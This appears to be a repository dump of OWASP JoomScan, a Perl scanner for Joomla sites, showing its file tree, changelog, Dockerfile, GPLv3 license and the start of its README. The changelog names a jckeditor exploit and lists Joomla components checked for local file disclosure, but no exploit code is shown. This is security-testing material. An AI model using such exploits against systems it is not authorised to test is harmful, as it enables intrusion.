├── .gitignore ├── CHANGELOG.md ├── Dockerfile ├── LICENSE.md ├── README.md ├── core ├── compare.pl ├── header.pl ├── main.pl ├── report.pl ├── update.pl └── ver.pl ├── exploit ├── com_lfd.pl ├── components.pl ├── db │ ├── componentslist.txt │ ├── comvul.txt │ └── corevul.txt ├── jckeditor.pl └── verexploit.pl ├── joomscan.pl ├── love.txt ├── modules ├── backupfinder.pl ├── configfinder.pl ├── cpfinder.pl ├── debugmode.pl ├── dirlisting.pl ├── errfinder.pl ├── missconfig.pl ├── pathdisclure.pl ├── reg.pl ├── robots.pl └── waf_detector.pl ├── reports └── hello.txt └── version /.gitignore: -------------------------------------------------------------------------------- 1 | #Ignore reports 2 | reports/* -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | OWASP JoomScan 0.0.7 [Self Challenge] 2 | ============ 3 | * com_joomanager exploiter removed 4 | * Added new module: Local File Disclosure vulnerability detector (Supports detection of [com_joomanager,s5_media_player,com_hdflvplayer,com_macgallery,com_cckjseblod,fsave,com_portfolio,com_picsell,captcha,com_rsfiles,com_addproperty,com_aceftp,com_jtagmembersdirectory,com_facegallery,com_docman,mod_dvfoldercontent,com_contushdvideoshare,com_jetext,com_product_modul,wddownload,com_community,com_download-monitor]) 5 | * Updated module: Firewall Detector (supports detection of [CloudFlare, Incapsula, Shieldfy, Mod_Security and 28 other modules ]) 6 | * Added exploit for jckeditor 7 | * Updated list of components 8 | * A few enhancements 9 | 10 | OWASP JoomScan 0.0.6 [#BHUSA] 11 | ============ 12 | * Updated vulnerability databases 13 | * Added new module: Firewall Detector (supports detection of [CloudFlare, Incapsula, Shieldfy, Mod_Security]) 14 | * Added exploit for com_joomanager 15 | * Updated list of common log paths 16 | * A few enhancements 17 | 18 | OWASP JoomScan 0.0.5 [KLOT] 19 | ============ 20 | * Update components database 21 | * Bug fixed (updating module) 22 | * Allow start from any path 23 | * Update backup finder database 24 | * Update report module 25 | * Update validate target method 26 | * HTTPS improvements 27 | * Fix issue #11 - Incorrect URL output for HTTPS site 28 | * Fix issue #12 - Components scan output issues 29 | * Fix issue #13 - Check a server is live or not! 30 | * Fix issue #9 - Disable redirectable requests for components finder module 31 | * A few enhancements 32 | 33 | OWASP JoomScan 0.0.1 [Reborn] 34 | ============ 35 | * Initial release 36 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM perl:5-slim 2 | COPY . /home/joomscan 3 | WORKDIR /home/joomscan 4 | RUN adduser joomscan --disabled-password --disabled-login --gecos "" --no-create-home --home /home/joomscan && chown joomscan:joomscan /home/joomscan -R 5 | RUN apt-get update && apt-get install -y libc6-dev gcc libcrypt-ssleay-perl openssl libssl-dev libz-dev && rm /var/lib/apt/lists/* -R 6 | RUN cpanm Bundle::LWP && cpanm LWP::Protocol::https 7 | USER joomscan 8 | ENTRYPOINT ["perl","joomscan.pl"] 9 | CMD ["-h"] 10 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | OWASP Joomscan Copyright (C) 2018 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![Version 0.0.7](https://img.shields.io/badge/Version-0.0.7-green.svg) 2 | ![Perl](https://img.shields.io/badge/Perl-5.x-yellow.svg) 3 | [![GPLv3 License](https://img.shields.io/badge/License-GPLv3-red.svg)](https://github.com/rezasp/joomscan/blob/master/LICENSE.md) 4 | [![Twitter](https://img.shields.io/badge/Twitter-@OWASP_JoomScan-blue.svg)](http://twitter.com/OWASP_JoomScan) 5 | [![Leader](https://img.shields.io/badge/Twitter-@rezesp-blue.svg)](http://www.twitter.com/rezesp) 6 | [![Leader](https://img.shields.io/badge/Twitter-@Ali_Razmjo0-blue.svg)](http://www.twitter.com/Ali_Razmjo0) 7 |
